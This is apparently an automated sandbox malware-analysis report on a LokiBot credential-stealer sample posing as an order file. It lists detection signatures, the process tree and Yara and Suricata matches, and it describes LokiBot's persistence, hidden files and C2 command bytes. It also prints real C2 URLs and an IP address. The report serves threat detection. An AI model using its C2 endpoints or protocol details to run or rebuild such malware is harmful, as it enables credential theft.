
Windows Analysis Report
Order84746.exe

Overview

General Information

Sample name: Order84746.exe
Analysis ID: 1565036
MD5: 6e891f3adbfd415fae70ff8376014769
SHA1: 9dd2239eba106fe8b3b97992064d07c532a0c9ee
SHA256: a2504b173353b434fe409705dbc066fb36c9a74d45a36d89ee421a1da3b4461b
Tags: exe, Loki, user-abuse_ch

Detection

Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Lokibot
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Order84746.exe (PID: 280 cmdline: "C:\Users\user\Desktop\Order84746.exe" MD5: 6E891F3ADBFD415FAE70FF8376014769)
    • svchost.exe (PID: 3300 cmdline: "C:\Users\user\Desktop\Order84746.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
Name: Loki Password Stealer (PWS), LokiBot

Description:
"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.

Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.

The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24 characters. For example: B7E1C2CC98066B250DDB2123.

Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\C98066\.

There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:

File extension | File description
.exe | A copy of the malware that will execute every time the user account is logged into
.lck | A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts
.hdb | A database of hashes for data that has already been exfiltrated to the C2 server
.kdb | A database of keylogger data that has yet to be sent to the C2 server

If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.

The first packet transmitted by Loki-Bot contains application data. The second packet transmitted by Loki-Bot contains decrypted Windows credentials. The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.

Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.

The first WORD of the HTTP Payload represents the Loki-Bot version. The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

Byte | Payload type
0x26 | Stolen Cryptocurrency Wallet
0x27 | Stolen Application Data
0x28 | Get C2 Commands from C2 Server
0x29 | Stolen File
0x2A | POS (Point of Sale?)
0x2B | Keylogger Data
0x2C | Screenshot

The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!

Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.

The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.

Loki-Bot can accept the following instructions from the C2 Server:

Byte | Instruction description
0x00 | Download EXE & Execute
0x01 | Download DLL & Load #1
0x02 | Download DLL & Load #2
0x08 | Delete HDB File
0x09 | Start Keylogger
0x0A | Mine & Steal Data
0x0E | Exit Loki-Bot
0x0F | Upgrade Loki-Bot
0x10 | Change C2 Polling Frequency
0x11 | Delete Executables & Exit

Suricata Signatures:

Rule SID | Rule name
2024311 | ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
2024312 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
2024313 | ET TROJAN Loki Bot Request for C2 Commands Detected M1
2024314 | ET TROJAN Loki Bot File Exfiltration Detected
2024315 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
2024316 | ET TROJAN Loki Bot Screenshot Exfiltration Detected
2024317 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
2024318 | ET TROJAN Loki Bot Request for C2 Commands Detected M2
2024319 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cb\u00ce\u00d0\u009b\u009e\u0089\u0096\u0091\u009c\u0096\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
Source | Rule | Description | Author | Strings
00000001.00000002.2659257287.0000000003621000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Lokibot_1f885282 | unknown | unknown | 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Source | Rule | Description | Author | Strings
0.2.Order84746.exe.38a0000.1.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
0.2.Order84746.exe.38a0000.1.unpack | Windows_Trojan_Lokibot_1f885282 | unknown | unknown | 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.Order84746.exe.38a0000.1.unpack | Windows_Trojan_Lokibot_0f421617 | unknown | unknown | 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.Order84746.exe.38a0000.1.unpack | Loki_1 | Loki Payload | kevoreilly | 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW; 0x133fc:$a2: last_compatible_version
0.2.Order84746.exe.38a0000.1.unpack | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group | 0x123ff:$des3: 68 03 66 00 00; 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X; 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\Order84746.exe", CommandLine: "C:\Users\user\Desktop\Order84746.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Order84746.exe", ParentImage: C:\Users\user\Desktop\Order84746.exe, ParentProcessId: 280, ParentProcessName: Order84746.exe, ProcessCommandLine: "C:\Users\user\Desktop\Order84746.exe", ProcessId: 3300, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\Order84746.exe", CommandLine: "C:\Users\user\Desktop\Order84746.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Order84746.exe", ParentImage: C:\Users\user\Desktop\Order84746.exe, ParentProcessId: 280, ParentProcessName: Order84746.exe, ProcessCommandLine: "C:\Users\user\Desktop\Order84746.exe", ProcessId: 3300, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T07:37:01.743805+0100 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:03.474759+0100 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 94.156.177.41 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T07:37:00.208189+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:02.129463+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49731 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:03.780451+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:05.683692+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:07.798758+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:11.363666+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:13.268211+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:15.019342+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:16.845716+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:21.749992+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:23.468794+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:25.297011+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:30.107976+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:32.298014+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:34.000360+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:35.905770+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:37.671798+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:39.516381+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:41.298199+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:43.127928+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:44.826715+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:46.499557+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:48.348566+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:50.256361+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:55.174548+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:56.938795+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:58.812353+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:01.082225+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:02.758235+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:04.577451+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:06.307814+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49788 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:08.178167+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49789 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:13.081566+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49805 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:14.764601+0100 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49806 | 94.156.177.41 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T07:37:05.193223+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49732 | TCP
2024-11-29T07:37:07.486946+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49733 | TCP
2024-11-29T07:37:11.095624+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49734 | TCP
2024-11-29T07:37:13.005901+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49735 | TCP
2024-11-29T07:37:14.759712+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49736 | TCP
2024-11-29T07:37:16.574591+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49738 | TCP
2024-11-29T07:37:21.486611+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49740 | TCP
2024-11-29T07:37:23.197276+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49744 | TCP
2024-11-29T07:37:25.027569+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49746 | TCP
2024-11-29T07:37:29.844766+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49747 | TCP
2024-11-29T07:37:32.037107+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49748 | TCP
2024-11-29T07:37:33.740688+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49749 | TCP
2024-11-29T07:37:35.642714+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49750 | TCP
2024-11-29T07:37:37.404244+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49751 | TCP
2024-11-29T07:37:39.256251+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49752 | TCP
2024-11-29T07:37:41.033957+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49753 | TCP
2024-11-29T07:37:42.786866+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49754 | TCP
2024-11-29T07:37:44.558497+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49755 | TCP
2024-11-29T07:37:46.232846+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49756 | TCP
2024-11-29T07:37:48.083520+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49757 | TCP
2024-11-29T07:37:49.955918+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49758 | TCP
2024-11-29T07:37:54.898521+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49759 | TCP
2024-11-29T07:37:56.670018+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49760 | TCP
2024-11-29T07:37:58.539743+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49763 | TCP
2024-11-29T07:38:00.821049+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49764 | TCP
2024-11-29T07:38:02.487383+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49770 | TCP
2024-11-29T07:38:04.320327+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49776 | TCP
2024-11-29T07:38:06.029060+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49782 | TCP
2024-11-29T07:38:07.905771+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49788 | TCP
2024-11-29T07:38:12.821427+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49789 | TCP
2024-11-29T07:38:14.498649+0100 | 2025483 | 1 | A Network Trojan was detected | 94.156.177.41 | 80 | 192.168.2.4 | 49805 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T07:37:05.072766+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:07.366794+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:10.975348+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:12.885873+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:14.639768+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:16.454677+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:21.366370+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:23.076999+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:24.907443+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:29.724840+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:31.916984+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:33.620651+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:35.522594+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:37.284247+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:39.136283+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:40.913875+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:42.666274+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:44.438287+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:46.112958+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:47.963472+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:49.835944+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:54.778517+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:56.550153+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:58.419693+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:00.701009+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:02.367408+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:04.200296+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:05.909208+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:07.785106+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49788 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:12.701337+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49789 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:14.378688+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49805 | 94.156.177.41 | 80 | TCP
2024-11-29T07:38:36.587730+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49806 | 94.156.177.41 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-29T07:37:05.072766+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:07.366794+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:10.975348+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:12.885873+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:14.639768+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:16.454677+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:21.366370+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:23.076999+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:24.907443+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:29.724840+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:31.916984+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:33.620651+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:35.522594+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:37.284247+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49751 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:39.136283+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:40.913875+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:42.666274+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49754 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:44.438287+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:46.112958+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:47.963472+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:49.835944+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:54.778517+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:56.550153+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | TCP
2024-11-29T07:37:58.419693+0100 | 2024318 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | TCP
